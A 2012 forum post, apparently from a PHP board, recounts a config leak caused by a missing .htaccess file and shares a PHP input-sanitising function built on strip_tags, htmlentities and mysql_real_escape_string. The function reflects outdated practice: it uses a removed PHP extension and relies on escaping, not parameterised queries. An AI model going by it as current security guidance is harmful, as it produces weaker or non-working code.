05.07.2012, 09:11
Yeah, totally. Just do it properly. 
Here's something to start with:
There's some other basic stuff that people shouldnt forget, for example .htaccess file. I forgot it once and someone gained access by simply checking the config, thank god I had different password for FTP and the project was in beta stages.
Here's something to start with:
PHP код:
//#^^ Input Cleaning Function ^^#//
/*
Cleans raw input, if link id
is supplied the data will be
prepped for DB entry, if Save
option is set to true HTML will
be converted rather than removed.
ACCEPTS: [VALUE] = string, [LINK] = db connection id, [SAVE] = bool
RETURNS: Clean user input
*/
private function Sanitize($value, $link = null, $save = false)
{
//TempDataHolder
$tempvar = null;
//If sending to a DB clean up for query
if($link != null)
{
if($save)
{
//Convert tags to ANCII CODE
$tempvar = htmlentities($value, ENT_QUOTES);
$value = $tempvar;
//Strip anything remaining
$tempvar = strip_tags($value);
$value = $tempvar;
}
else
{
//Strip code tags out
$tempvar = strip_tags($value);
$value = $tempvar;
//Convert Remaining special chars
$tempvar = htmlentities($value, ENT_QUOTES);
$value = $tempvar;
}
//PHP manual highly recommends this function
//for any value being entered into a database
$tempvar = mysql_real_escape_string($value, $link);
$value = $tempvar;
}
else
{
//Strip code tags out
$tempvar = strip_tags($value);
$value = $tempvar;
//Convert Remaining special chars
$tempvar = htmlentities($value, ENT_QUOTES);
$value = $tempvar;
}
RETURN $value;
}